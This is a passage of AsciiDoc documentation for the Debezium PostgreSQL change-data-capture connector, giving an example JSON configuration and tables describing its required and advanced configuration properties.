When the connector starts, it {link-prefix}:{link-postgresql-connector}#postgresql-snapshots[performs a consistent snapshot] of the PostgreSQL server databases that the connector is configured for. The connector then starts generating data change events for row-level operations and streaming change event records to Kafka topics.

endif::product[]

ifdef::community[]

// Type: concept
// ModuleID: debezium-postgresql-connector-configuration-example
// Title: {prodname} PostgreSQL connector configuration example
[[postgresql-example-configuration]]
=== Connector configuration example

Following is an example of the configuration for a PostgreSQL connector that connects to a PostgreSQL server on port 5432 at 192.168.99.100, whose logical name is `fulfillment`. Typically, you configure the {prodname} PostgreSQL connector in a `.json` file using the configuration properties available for the connector.

You can choose to produce events for a subset of the schemas and tables. Optionally, ignore, mask, or truncate columns that are sensitive, too large, or not needed.

[source,json]
----
{
  "name": "fulfillment-connector", // <1>
  "config": {
    "connector.class": "io.debezium.connector.postgresql.PostgresConnector", // <2>
    "database.hostname": "192.168.99.100", // <3>
    "database.port": "5432", // <4>
    "database.user": "postgres", // <5>
    "database.password": "postgres", // <6>
    "database.dbname": "postgres", // <7>
    "database.server.name": "fulfillment", // <8>
    "table.include.list": "public.inventory" // <9>
  }
}
----
<1> The name of the connector when registered with a Kafka Connect service.
<2> The name of this PostgreSQL connector class.
<3> The address of the PostgreSQL server.
<4> The port number of the PostgreSQL server.
<5> The name of the PostgreSQL user that has the {link-prefix}:{link-postgresql-connector}#postgresql-permissions[required privileges].
<6> The password for the PostgreSQL user that has the {link-prefix}:{link-postgresql-connector}#postgresql-permissions[required privileges].
<7> The name of the PostgreSQL database to connect to.
<8> The logical name of the PostgreSQL server/cluster, which forms a namespace and is used in all the names of the Kafka topics to which the connector writes, the Kafka Connect schema names, and the namespaces of the corresponding Avro schema when the Avro converter is used.
<9> A list of all tables hosted by this server that this connector will monitor.
This is optional, and there are other properties for listing the schemas and tables to include or exclude from monitoring.\n\nSee the {link-prefix}:{link-postgresql-connector}#postgresql-connector-properties[complete list of PostgreSQL connector properties] that can be specified in these configurations.\n\nYou can send this configuration with a `POST` command to a running Kafka Connect service. The service records the configuration and starts the connector task that connects to the PostgreSQL database and streams change event records to Kafka topics.\n\n[[postgresql-adding-connector-configuration]]\n=== Adding connector configuration\n\nTo start running a PostgreSQL connector, create a connector configuration and add the configuration to your Kafka Connect cluster.\n\n.Prerequisites\n\n* The {link-prefix}:{link-postgresql-connector}#postgresql-server-configuration[PostgreSQL server] is configured to support logical replication.\n\n* The {link-prefix}:{link-postgresql-connector}#installing-postgresql-output-plugin[logical decoding plug-in] is installed.\n\n* The PostgreSQL connector is installed.\n\n.Procedure\n\n. Create a configuration for the PostgreSQL connector.\n\n. Use the link:{link-kafka-docs}\/#connect_rest[Kafka Connect REST API] to add that connector configuration to your Kafka Connect cluster.\n\nendif::community[]\n\n\/\/ Type: reference\n\/\/ ModuleID: descriptions-of-debezium-postgresql-connector-configuration-properties\n\/\/ Title: Description of {prodname} PostgreSQL connector configuration properties\n[[postgresql-connector-properties]]\n=== Connector configuration properties\n\nThe {prodname} PostgreSQL connector has many configuration properties that you can use to achieve the right connector behavior for your application. Many properties have default values. Information about the properties is organized as follows:\n\n* xref:postgresql-required-configuration-properties[Required configuration properties]\n* xref:postgresql-advanced-configuration-properties[Advanced configuration properties]\n* xref:postgresql-pass-through-properties[Pass-through configuration properties]\n\n[id=\"postgresql-required-configuration-properties\"]\nThe following configuration properties are _required_ unless a default value is available.\n\n.Required connector configuration properties\n[cols=\"30%a,25%a,45%a\",options=\"header\"]\n|===\n|Property\n|Default\n|Description\n\n|[[postgresql-property-name]]<<postgresql-property-name, `+name+`>>\n|\n|Unique name for the connector. Attempting to register again with the same name will fail. This property is required by all Kafka Connect connectors.\n\n|[[postgresql-property-connector-class]]<<postgresql-property-connector-class, `+connector.class+`>>\n|\n|The name of the Java class for the connector. Always use a value of `io.debezium.connector.postgresql.PostgresConnector` for the PostgreSQL connector.\n\n|[[postgresql-property-tasks-max]]<<postgresql-property-tasks-max, `+tasks.max+`>>\n|`1`\n|The maximum number of tasks that should be created for this connector. 
The PostgreSQL connector always uses a single task and therefore does not use this value, so the default is always acceptable.

|[[postgresql-property-plugin-name]]<<postgresql-property-plugin-name, `+plugin.name+`>>
|`decoderbufs`
|The name of the PostgreSQL {link-prefix}:{link-postgresql-connector}#postgresql-output-plugin[logical decoding plug-in] installed on the PostgreSQL server.

ifdef::community[]
Supported values are `decoderbufs`, `wal2json`, `+wal2json_rds+`, `+wal2json_streaming+`, `+wal2json_rds_streaming+`, and `pgoutput`.

If you are using a `wal2json` plug-in and transactions are very large, the JSON batch event that contains all transaction changes might not fit into the hard-coded memory buffer, which has a size of 1 GB. In such cases, switch to a streaming plug-in by setting the `plugin.name` property to `wal2json_streaming` or `wal2json_rds_streaming`. With a streaming plug-in, PostgreSQL sends the connector a separate message for each change in a transaction.

endif::community[]
ifdef::product[]
The only supported value is `pgoutput`. You must explicitly set `plugin.name` to `pgoutput`.
endif::product[]

|[[postgresql-property-slot-name]]<<postgresql-property-slot-name, `+slot.name+`>>
|`debezium`
|The name of the PostgreSQL logical decoding slot that was created for streaming changes from a particular plug-in for a particular database/schema. The server uses this slot to stream events to the {prodname} connector that you are configuring.

Slot names must conform to link:https://www.postgresql.org/docs/current/static/warm-standby.html#STREAMING-REPLICATION-SLOTS-MANIPULATION[PostgreSQL replication slot naming rules], which state: _"Each replication slot has a name, which can contain lower-case letters, numbers, and the underscore character."_

|[[postgresql-property-slot-drop-on-stop]]<<postgresql-property-slot-drop-on-stop, `+slot.drop.on.stop+`>>
|`false`
|Whether or not to delete the logical replication slot when the connector stops in a graceful, expected way. The default behavior is that the replication slot remains configured for the connector when the connector stops. When the connector restarts, having the same replication slot enables the connector to start processing where it left off.

Set to `true` only in testing or development environments. Dropping the slot allows the database to discard WAL segments.
When the connector restarts it performs a new snapshot or it can continue from a persistent offset in the Kafka Connect offsets topic.\n\n|[[postgresql-property-publication-name]]<<postgresql-property-publication-name, `+publication.name+`>>\n|`dbz_publication`\n|The name of the PostgreSQL publication created for streaming changes when using `pgoutput`.\n\nThis publication is created at start-up if it does not already exist and it includes _all tables_.\n{prodname} then applies its own include\/exclude list filtering, if configured, to limit the publication to change events for the specific tables of interest.\nThe connector user must have superuser permissions to create this publication,\nso it is usually preferable to create the publication before starting the connector for the first time.\n\nIf the publication already exists, either for all tables or configured with a subset of tables, {prodname} uses the publication as it is defined.\n\n|[[postgresql-property-database-hostname]]<<postgresql-property-database-hostname, `+database.hostname+`>>\n|\n|IP address or hostname of the PostgreSQL database server.\n\n|[[postgresql-property-database-port]]<<postgresql-property-database-port, `+database.port+`>>\n|`5432`\n|Integer port number of the PostgreSQL database server.\n\n|[[postgresql-property-database-user]]<<postgresql-property-database-user, `+database.user+`>>\n|\n|Name of the PostgreSQL database user for connecting to the PostgreSQL database server.\n\n|[[postgresql-property-database-password]]<<postgresql-property-database-password, `+database.password+`>>\n|\n|Password to use when connecting to the PostgreSQL database server.\n\n|[[postgresql-property-database-dbname]]<<postgresql-property-database-dbname, `+database.dbname+`>>\n|\n|The name of the PostgreSQL database from which to stream the changes.\n\n|[[postgresql-property-database-server-name]]<<postgresql-property-database-server-name, `+database.server.name+`>>\n|\n|Logical name that identifies and provides a namespace for the particular PostgreSQL database server or cluster in which {prodname} is capturing changes. Only alphanumeric characters and underscores should be used in the database server logical name. The logical name should be unique across all other connectors, since it is used as a topic name prefix for all Kafka topics that receive records from this connector.\n\n|[[postgresql-property-schema-include-list]]<<postgresql-property-schema-include-list, `+schema.include.list+`>>\n|\n|An optional, comma-separated list of regular expressions that match names of schemas for which you *want* to capture changes. Any schema name not included in `schema.include.list` is excluded from having its changes captured. By default, all non-system schemas have their changes captured. Do not also set the `schema.exclude.list` property.\n\n|[[postgresql-property-schema-exclude-list]]<<postgresql-property-schema-exclude-list, `+schema.exclude.list+`>>\n|\n|An optional, comma-separated list of regular expressions that match names of schemas for which you *do not* want to capture changes. Any schema whose name is not included in `schema.exclude.list` has its changes captured, with the exception of system schemas. Do not also set the `schema.include.list` property.\n\n|[[postgresql-property-table-include-list]]<<postgresql-property-table-include-list, `+table.include.list+`>>\n|\n|An optional, comma-separated list of regular expressions that match fully-qualified table identifiers for tables whose changes you want to capture. 
Any table not included in `table.include.list` does not have its changes captured. Each identifier is of the form _schemaName_._tableName_. By default, the connector captures changes in every non-system table in each schema whose changes are being captured. Do not also set the `table.exclude.list` property.

|[[postgresql-property-table-exclude-list]]<<postgresql-property-table-exclude-list, `+table.exclude.list+`>>
|
|An optional, comma-separated list of regular expressions that match fully-qualified table identifiers for tables whose changes you *do not* want to capture. Any table not included in `table.exclude.list` has its changes captured. Each identifier is of the form _schemaName_._tableName_. Do not also set the `table.include.list` property.

|[[postgresql-property-column-include-list]]<<postgresql-property-column-include-list, `+column.include.list+`>>
|
|An optional, comma-separated list of regular expressions that match the fully-qualified names of columns that should be included in change event record values. Fully-qualified names for columns are of the form _schemaName_._tableName_._columnName_. Do not also set the `column.exclude.list` property.

|[[postgresql-property-column-exclude-list]]<<postgresql-property-column-exclude-list, `+column.exclude.list+`>>
|
|An optional, comma-separated list of regular expressions that match the fully-qualified names of columns that should be excluded from change event record values. Fully-qualified names for columns are of the form _schemaName_._tableName_._columnName_. Do not also set the `column.include.list` property.

|[[postgresql-property-time-precision-mode]]<<postgresql-property-time-precision-mode, `+time.precision.mode+`>>
|`adaptive`
|Time, date, and timestamps can be represented with different kinds of precision: +
 +
`adaptive` captures the time and timestamp values exactly as in the database using either millisecond, microsecond, or nanosecond precision values based on the database column's type. +
 +
`adaptive_time_microseconds` captures the date, datetime and timestamp values exactly as in the database using either millisecond, microsecond, or nanosecond precision values based on the database column's type. An exception is `TIME` type fields, which are always captured as microseconds. +
 +
`connect` always represents time and timestamp values by using Kafka Connect's built-in representations for `Time`, `Date`, and `Timestamp`, which use millisecond precision regardless of the database columns' precision. See {link-prefix}:{link-postgresql-connector}#postgresql-temporal-values[temporal values].

|[[postgresql-property-decimal-handling-mode]]<<postgresql-property-decimal-handling-mode, `+decimal.handling.mode+`>>
|`precise`
|Specifies how the connector should handle values for `DECIMAL` and `NUMERIC` columns: +
 +
`precise` represents values by using `java.math.BigDecimal` to represent values in binary form in change events. +
 +
`double` represents values by using `double` values, which might result in a loss of precision but which is easier to use. +
 +
`string` encodes values as formatted strings, which are easy to consume but semantic information about the real type is lost.
See {link-prefix}:{link-postgresql-connector}#postgresql-decimal-types[Decimal types].\n\n|[[postgresql-property-hstore-handling-mode]]<<postgresql-property-hstore-handling-mode, `+hstore.handling.mode+`>>\n|`map`\n| Specifies how the connector should handle values for `hstore` columns: +\n +\n`map` represents values by using `MAP`. +\n +\n`json` represents values by using `json string`. This setting encodes values as formatted strings such as `{\"key\" : \"val\"}`. See {link-prefix}:{link-postgresql-connector}#postgresql-hstore-type[PostgreSQL `HSTORE` type].\n\n|[[postgresql-property-interval-handling-mode]]<<postgresql-property-interval-handling-mode, `+interval.handling.mode+`>>\n|`numeric`\n| Specifies how the connector should handle values for `interval` columns: +\n +\n`numeric` represents intervals using approximate number of microseconds. +\n +\n`string` represents intervals exactly by using the string pattern representation `P<years>Y<months>M<days>DT<hours>H<minutes>M<seconds>S`. For example: `P1Y2M3DT4H5M6.78S`. See {link-prefix}:{link-postgresql-connector}#postgresql-basic-types[PostgreSQL basic types].\n\n|[[postgresql-property-database-sslmode]]<<postgresql-property-database-sslmode, `+database.sslmode+`>>\n|`disable`\n|Whether to use an encrypted connection to the PostgreSQL server. Options include: +\n +\n`disable` uses an unencrypted connection. +\n +\n`require` uses a secure (encrypted) connection, and fails if one cannot be established. +\n +\n`verify-ca` behaves like `require` but also verifies the server TLS certificate against the configured Certificate Authority (CA) certificates, or fails if no valid matching CA certificates are found. +\n +\n`verify-full` behaves like `verify-ca` but also verifies that the server certificate matches the host to which the connector is trying to connect. See link:https:\/\/www.postgresql.org\/docs\/current\/static\/libpq-connect.html[the PostgreSQL documentation] for more information.\n\n|[[postgresql-property-database-sslcert]]<<postgresql-property-database-sslcert, `+database.sslcert+`>>\n|\n|The path to the file that contains the SSL certificate for the client. See link:https:\/\/www.postgresql.org\/docs\/current\/static\/libpq-connect.html[the PostgreSQL documentation] for more information.\n\n|[[postgresql-property-database-sslkey]]<<postgresql-property-database-sslkey, `+database.sslkey+`>>\n|\n|The path to the file that contains the SSL private key of the client. See link:https:\/\/www.postgresql.org\/docs\/current\/static\/libpq-connect.html[the PostgreSQL documentation] for more information.\n\n|[[postgresql-property-database-sslpassword]]<<postgresql-property-database-sslpassword, `+database.sslpassword+`>>\n|\n|The password to access the client private key from the file specified by `database.sslkey`. See link:https:\/\/www.postgresql.org\/docs\/current\/static\/libpq-connect.html[the PostgreSQL documentation] for more information.\n\n|[[postgresql-property-database-sslrootcert]]<<postgresql-property-database-sslrootcert, `+database.sslrootcert+`>>\n|\n|The path to the file that contains the root certificate(s) against which the server is validated. See link:https:\/\/www.postgresql.org\/docs\/current\/static\/libpq-connect.html[the PostgreSQL documentation] for more information.\n\n|[[postgresql-property-database-tcpkeepalive]]<<postgresql-property-database-tcpkeepalive, `+database.tcpKeepAlive+`>>\n|`true`\n|Enable TCP keep-alive probe to verify that the database connection is still alive. 
See link:https://www.postgresql.org/docs/current/static/libpq-connect.html[the PostgreSQL documentation] for more information.

|[[postgresql-property-tombstones-on-delete]]<<postgresql-property-tombstones-on-delete, `+tombstones.on.delete+`>>
|`true`
|Controls whether a tombstone event should be generated after a _delete_ event. +
 +
`true` - delete operations are represented by a _delete_ event and a subsequent tombstone event. +
 +
`false` - only a _delete_ event is sent. +
 +
After a _delete_ operation, emitting a tombstone event enables Kafka to delete all change event records that have the same key as the deleted row.

|[[postgresql-property-column-truncate-to-length-chars]]<<postgresql-property-column-truncate-to-length-chars, `+column.truncate.to._length_.chars+`>>
|_n/a_
|An optional, comma-separated list of regular expressions that match the fully-qualified names of character-based columns. Fully-qualified names for columns are of the form _schemaName_._tableName_._columnName_. In change event records, values in these columns are truncated if they are longer than the number of characters specified by _length_ in the property name. You can specify multiple properties with different lengths in a single configuration. Length must be a positive integer, for example, `+column.truncate.to.20.chars+`.

|[[postgresql-property-column-mask-with-length-chars]]<<postgresql-property-column-mask-with-length-chars, `+column.mask.with._length_.chars+`>>
|_n/a_
|An optional, comma-separated list of regular expressions that match the fully-qualified names of character-based columns. Fully-qualified names for columns are of the form _schemaName_._tableName_._columnName_. In change event values, the values in the specified table columns are replaced with _length_ number of asterisk (`*`) characters. You can specify multiple properties with different lengths in a single configuration. Length must be a positive integer or zero. When you specify zero, the connector replaces a value with an empty string.

|[[postgresql-property-column-mask-hash]]<<postgresql-property-column-mask-hash, `+column.mask.hash._hashAlgorithm_.with.salt._salt_+`>>
|_n/a_
|An optional, comma-separated list of regular expressions that match the fully-qualified names of character-based columns. Fully-qualified names for columns are of the form _schemaName_._tableName_._columnName_. In change event values, the values in the specified columns are replaced with pseudonyms. +
 +
A pseudonym consists of the hashed value that results from applying the specified _hashAlgorithm_ and _salt_. Based on the hash function that is used, referential integrity is kept while column values are replaced with pseudonyms. Supported hash functions are described in the {link-java7-standard-names}[MessageDigest section] of the Java Cryptography Architecture Standard Algorithm Name Documentation. +
 +
If necessary, the pseudonym is automatically shortened to the length of the column. You can specify multiple properties with different hash algorithms and salts in a single configuration. In the following example, `CzQMA0cB5K` is a randomly selected salt. +
 +
`column.mask.hash.SHA-256.with.salt.CzQMA0cB5K = inventory.orders.customerName, inventory.shipment.customerName` +
 +
Depending on the _hashAlgorithm_ used, the _salt_ selected, and the actual data set, the resulting masked data set might not be completely masked.

|[[postgresql-property-column-propagate-source-type]]<<postgresql-property-column-propagate-source-type, `+column.propagate.source.type+`>>
|_n/a_
|An optional, comma-separated list of regular expressions that match the fully-qualified names of columns. Fully-qualified names for columns are of the form _databaseName_._tableName_._columnName_, or _databaseName_._schemaName_._tableName_._columnName_. +
 +
For each specified column, the connector adds the column's original type and original length as parameters to the corresponding field schemas in the emitted change records. The following added schema parameters propagate the original type name and also the original length for variable-width types: +
 +
`pass:[_]pass:[_]debezium.source.column.type` + `pass:[_]pass:[_]debezium.source.column.length` + `pass:[_]pass:[_]debezium.source.column.scale` +
 +
This property is useful for properly sizing corresponding columns in sink databases.

|[[postgresql-property-datatype-propagate-source-type]]<<postgresql-property-datatype-propagate-source-type, `+datatype.propagate.source.type+`>>
|_n/a_
|An optional, comma-separated list of regular expressions that match the database-specific data type name for some columns. Fully-qualified data type names are of the form _databaseName_._tableName_._typeName_, or _databaseName_._schemaName_._tableName_._typeName_. +
 +
For these data types, the connector adds parameters to the corresponding field schemas in emitted change records. The added parameters specify the original type and length of the column: +
 +
`pass:[_]pass:[_]debezium.source.column.type` + `pass:[_]pass:[_]debezium.source.column.length` + `pass:[_]pass:[_]debezium.source.column.scale` +
 +
These parameters propagate a column's original type name and length, for variable-width types, respectively. This property is useful for properly sizing corresponding columns in sink databases. +
 +
See the {link-prefix}:{link-postgresql-connector}#postgresql-data-types[list of PostgreSQL-specific data type names].

|[[postgresql-property-message-key-columns]]<<postgresql-property-message-key-columns, `+message.key.columns+`>>
|_empty string_
|A semicolon separated list of tables with regular expressions that match table column names. The connector maps values in matching columns to key fields in change event records that it sends to Kafka topics. This is useful when a table does not have a primary key, or when you want to order change event records in a Kafka topic according to a field that is not a primary key. +
 +
Separate entries with semicolons. Insert a colon between the fully-qualified table name and its regular expression. The format is: +
 +
_schema-name_._table-name_:_regexp_;... +
 +
For example, +
 +
`schemaA.table_a:regex_1;schemaB.table_b:regex_2;schemaC.table_c:regex_3` +
 +
If `table_a` has an `id` column, and `regex_1` is `^i` (matches any column that starts with `i`), the connector maps the value in ``table_a``'s `id` column to a key field in change events that the connector sends to Kafka.

|[[postgresql-publication-autocreate-mode]]<<postgresql-publication-autocreate-mode, `+publication.autocreate.mode+`>>
|`all_tables`
|Applies only when streaming changes by using link:https://www.postgresql.org/docs/current/sql-createpublication.html[the `pgoutput` plug-in]. The setting determines how creation of a link:https://www.postgresql.org/docs/current/logical-replication-publication.html[publication] should work. Possible settings are: +
 +
`all_tables` - If a publication exists, the connector uses it. If a publication does not exist, the connector creates a publication for all tables in the database for which the connector is capturing changes. This requires that the database user that has permission to perform replications also has permission to create a publication. This is granted with `CREATE PUBLICATION <publication_name> FOR ALL TABLES;`. +
 +
`disabled` - The connector does not attempt to create a publication. A database administrator or the user configured to perform replications must have created the publication before running the connector. If the connector cannot find the publication, the connector throws an exception and stops. For an example of creating a publication manually, see the sketch after this table. +
 +
`filtered` - If a publication exists, the connector uses it. If no publication exists, the connector creates a new publication for tables that match the current filter configuration as specified by the `database.exclude.list`, `schema.include.list`, `schema.exclude.list`, and `table.include.list` connector configuration properties. For example: `CREATE PUBLICATION <publication_name> FOR TABLE <tbl1, tbl2, tbl3>`.

|[[postgresql-property-binary-handling-mode]]<<postgresql-property-binary-handling-mode, `+binary.handling.mode+`>>
|`bytes`
|Specifies how binary (`bytea`) columns should be represented in change events: +
 +
`bytes` represents binary data as a byte array. +
 +
`base64` represents binary data as base64-encoded strings. +
 +
`hex` represents binary data as hex-encoded (base16) strings.

|[[postgresql-property-truncate-handling-mode]]<<postgresql-property-truncate-handling-mode, `+truncate.handling.mode+`>>
|`skip`
|Specifies whether `TRUNCATE` events should be propagated (only available when using the `pgoutput` plug-in with Postgres 11 or later): +
 +
`skip` causes those events to be omitted (the default). +
 +
`include` causes those events to be included. +
 +
See xref:postgresql-truncate-events[] for the structure of _truncate_ events and their ordering semantics.

|===
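
As referenced in the `disabled` description above, if you prefer to create the publication yourself before starting the connector, a minimal sketch might look like the following. The publication name `dbz_publication` matches the connector's default `publication.name`, and the table names are illustrative:

[source,sql]
----
-- Publication restricted to the tables the connector should capture
-- (requires ownership of the listed tables; PostgreSQL 10+ syntax).
CREATE PUBLICATION dbz_publication FOR TABLE inventory.orders, inventory.customers;
----
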
[id="postgresql-advanced-configuration-properties"]
The following _advanced_ configuration properties have defaults that work in most situations and therefore rarely need to be specified in the connector's configuration.

.Advanced connector configuration properties
[cols="30%a,28%a,42%a",options="header"]
|===
|Property
|Default
|Description

|[[postgresql-property-snapshot-mode]]<<postgresql-property-snapshot-mode, `+snapshot.mode+`>>
|`initial`
|Specifies the criteria for performing a snapshot when the connector starts: +
 +
`initial` - The connector performs a snapshot only when no offsets have been recorded for the logical server name. +
 +
`always` - The connector performs a snapshot each time the connector starts. +
 +
`never` - The connector never performs snapshots. When a connector is configured this way, its behavior when it starts is as follows. If there is a previously stored LSN in the Kafka offsets topic, the connector continues streaming changes from that position. If no LSN has been stored, the connector starts streaming changes from the point in time when the PostgreSQL logical replication slot was created on the server. The `never` snapshot mode is useful only when you know all data of interest is still reflected in the WAL. +
 +
`initial_only` - The connector performs an initial snapshot and then stops, without processing any subsequent changes. +
 +
`exported` - The connector performs a snapshot based on the point in time when the replication slot was created. This is an excellent way to perform the snapshot in a lock-free way. +
 +
ifdef::community[]
`custom` - The connector performs a snapshot according to the setting for the `snapshot.custom.class` property, which is a custom implementation of the `io.debezium.connector.postgresql.spi.Snapshotter` interface. +
endif::community[]
 +
The {link-prefix}:{link-postgresql-connector}#snapshot-mode-settings[reference table for snapshot mode settings] has more details.

ifdef::community[]
|[[postgresql-property-snapshot-custom-class]]<<postgresql-property-snapshot-custom-class, `+snapshot.custom.class+`>>
|
|A full Java class name that is an implementation of the `io.debezium.connector.postgresql.spi.Snapshotter` interface. Required when the `snapshot.mode` property is set to `custom`. See {link-prefix}:{link-postgresql-connector}#postgresql-custom-snapshot[custom snapshotter SPI].
endif::community[]

|[[postgresql-property-snapshot-include-collection-list]]<<postgresql-property-snapshot-include-collection-list, `+snapshot.include.collection.list+`>>
|All tables specified in `table.include.list`
|An optional, comma-separated list of regular expressions that match names of schemas specified in `table.include.list` for which you *want* to take the snapshot when the `snapshot.mode` is not `never`.

|[[postgresql-property-snapshot-lock-timeout-ms]]<<postgresql-property-snapshot-lock-timeout-ms, `+snapshot.lock.timeout.ms+`>>
|`10000`
|Positive integer value that specifies the maximum amount of time (in milliseconds) to wait to obtain table locks when performing a snapshot. If the connector cannot acquire table locks in this time interval, the snapshot fails. {link-prefix}:{link-postgresql-connector}#postgresql-snapshots[How the connector performs snapshots] provides details.

|[[postgresql-property-snapshot-select-statement-overrides]]<<postgresql-property-snapshot-select-statement-overrides, `+snapshot.select.statement.overrides+`>>
|
|Controls which table rows are included in snapshots. This property affects snapshots only. It does not affect events that are generated by the logical decoding plug-in. Specify a comma-separated list of fully-qualified table names in the form _databaseName.tableName_. +
 +
For each table that you specify, also specify another configuration property: `snapshot.select.statement.overrides._DB_NAME_._TABLE_NAME_`, for example: `snapshot.select.statement.overrides.customers.orders`. Set this property to a `SELECT` statement that obtains only the rows that you want in the snapshot. When the connector performs a snapshot, it executes this `SELECT` statement to retrieve data from that table. +
 +
A possible use case for setting these properties is large, append-only tables. You can specify a `SELECT` statement that sets a specific point for where to start a snapshot, or where to resume a snapshot if a previous snapshot was interrupted.

|[[postgresql-property-event-processing-failure-handling-mode]]<<postgresql-property-event-processing-failure-handling-mode, `+event.processing.failure.handling.mode+`>>
|`fail`
|Specifies how the connector should react to exceptions during processing of events: +
 +
`fail` propagates the exception, indicates the offset of the problematic event, and causes the connector to stop. +
 +
`warn` logs the offset of the problematic event, skips that event, and continues processing. +
 +
`skip` skips the problematic event and continues processing.

|[[postgresql-property-max-queue-size]]<<postgresql-property-max-queue-size, `+max.queue.size+`>>
|`20240`
|Positive integer value for the maximum size of the blocking queue. The connector places change events received from streaming replication in the blocking queue before writing them to Kafka. This queue can provide backpressure when, for example, writing records to Kafka is slower than it should be, or when Kafka is not available.

|[[postgresql-property-max-batch-size]]<<postgresql-property-max-batch-size, `+max.batch.size+`>>
|`10240`
|Positive integer value that specifies the maximum size of each batch of events that the connector processes.

|[[postgresql-property-max-queue-size-in-bytes]]<<postgresql-property-max-queue-size-in-bytes, `+max.queue.size.in.bytes+`>>
|`0`
|Long value for the maximum size in bytes of the blocking queue. This feature is disabled by default; it is activated when the property is set to a positive long value.

|[[postgresql-property-poll-interval-ms]]<<postgresql-property-poll-interval-ms, `+poll.interval.ms+`>>
|`1000`
|Positive integer value that specifies the number of milliseconds the connector should wait for new change events to appear before it starts processing a batch of events. Defaults to 1000 milliseconds, or 1 second.

|[[postgresql-property-include-unknown-datatypes]]<<postgresql-property-include-unknown-datatypes, `+include.unknown.datatypes+`>>
|`false`
|Specifies connector behavior when the connector encounters a field whose data type is unknown. The default behavior is that the connector omits the field from the change event and logs a warning. +
 +
Set this property to `true` if you want the change event to contain an opaque binary representation of the field. This lets consumers decode the field. You can control the exact representation by setting the {link-prefix}:{link-postgresql-connector}#postgresql-property-binary-handling-mode[`binary handling mode`] property.

NOTE: Consumers risk backward compatibility issues when `include.unknown.datatypes` is set to `true`. Not only may the database-specific binary representation change between releases, but if the data type is eventually supported by {prodname}, the data type will be sent downstream in a logical type, which would require adjustments by consumers. In general, when encountering unsupported data types, create a feature request so that support can be added.

|[[postgresql-property-database-initial-statements]]<<postgresql-property-database-initial-statements, `+database.initial.statements+`>>
|
|A semicolon separated list of SQL statements that the connector executes when it establishes a JDBC connection to the database.
To use a semicolon as a character and not as a delimiter, specify two consecutive semicolons, `;;`. +\n +\nThe connector may establish JDBC connections at its own discretion. Consequently, this property is useful for configuration of session parameters only, and not for executing DML statements. +\n +\nThe connector does not execute these statements when it creates a connection for reading the transaction log. +\n\n|[[postgresql-property-heartbeat-interval-ms]]<<postgresql-property-heartbeat-interval-ms, `+heartbeat.interval.ms+`>>\n|`0`\n|Controls how frequently the connector sends heartbeat messages to a Kafka topic. The default behavior is that the connector does not send heartbeat messages. +\n +\nHeartbeat messages are useful for monitoring whether the connector is receiving change events from the database. Heartbeat messages might help decrease the number of change events that need to be re-sent when a connector restarts. To send heartbeat messages, set this property to a positive integer, which indicates the number of milliseconds between heartbeat messages. +\n +\nHeartbeat messages are needed when there are many updates in a database that is being tracked but only a tiny number of updates are related to the table(s) and schema(s) for which the connector is capturing changes. In this situation, the connector reads from the database transaction log as usual but rarely emits change records to Kafka. This means that no offset updates are committed to Kafka and the connector does not have an opportunity to send the latest retrieved LSN to the database. The database retains WAL files that contain events that have already been processed by the connector. Sending heartbeat messages enables the connector to send the latest retrieved LSN to the database, which allows the database to reclaim disk space being used by no longer needed WAL files.\n\n|[[postgresql-property-heartbeat-topics-prefix]]<<postgresql-property-heartbeat-topics-prefix, `+heartbeat.topics.prefix+`>>\n|`__debezium-heartbeat`\n|Controls the name of the topic to which the connector sends heartbeat messages. The topic name has this pattern: +\n +\n_<heartbeat.topics.prefix>_._<server.name>_ +\n +\nFor example, if the database server name is `fulfillment`, the default topic name is `__debezium-heartbeat.fulfillment`.\n\n|[[postgresql-property-heartbeat-action-query]]<<postgresql-property-heartbeat-action-query, `+heartbeat.action.query+`>>\n|\n|Specifies a query that the connector executes on the source database when the connector sends a heartbeat message. +\n +\nThis is useful for resolving the situation described in {link-prefix}:{link-postgresql-connector}#postgresql-wal-disk-space[WAL disk space consumption], where capturing changes from a low-traffic database on the same host as a high-traffic database prevents {prodname} from processing WAL records and thus acknowledging WAL positions with the database. 
To address this situation, create a heartbeat table in the low-traffic database, and set this property to a statement that inserts records into that table, for example: +\n +\n`INSERT INTO test_heartbeat_table (text) VALUES ('test_heartbeat')` +\n +\nThis allows the connector to receive changes from the low-traffic database and acknowledge their LSNs, which prevents unbounded WAL growth on the database host.\n\n|[[postgresql-property-schema-refresh-mode]]<<postgresql-property-schema-refresh-mode, `+schema.refresh.mode+`>>\n|`columns_diff`\n|Specify the conditions that trigger a refresh of the in-memory schema for a table. +\n +\n`columns_diff` is the safest mode. It ensures that the in-memory schema stays in sync with the database table's schema at all times. +\n +\n`columns_diff_exclude_unchanged_toast` instructs the connector to refresh the in-memory schema cache if there is a discrepancy with the schema derived from the incoming message, unless unchanged TOASTable data fully accounts for the discrepancy. +\n +\nThis setting can significantly improve connector performance if there are frequently-updated tables that have TOASTed data that are rarely part of updates. However, it is possible for the in-memory schema to\nbecome outdated if TOASTable columns are dropped from the table.\n\n|[[postgresql-property-snapshot-delay-ms]]<<postgresql-property-snapshot-delay-ms, `+snapshot.delay.ms+`>>\n|\n|An interval in milliseconds that the connector should wait before performing a snapshot when the connector starts. If you are starting multiple connectors in a cluster, this property is useful for avoiding snapshot interruptions, which might cause re-balancing of connectors.\n\n|[[postgresql-property-snapshot-fetch-size]]<<postgresql-property-snapshot-fetch-size, `+snapshot.fetch.size+`>>\n|`10240`\n|During a snapshot, the connector reads table content in batches of rows. This property specifies the maximum number of rows in a batch.\n\n|[[postgresql-property-slot-stream-params]]<<postgresql-property-slot-stream-params, `+slot.stream.params+`>>\n|\n|Semicolon separated list of parameters to pass to the configured logical decoding plug-in. For example, `add-tables=public.table,public.table2;include-lsn=true`.\n\nifdef::community[]\nIf you are using the `wal2json` plug-in, this property is useful for enabling server-side table filtering. 
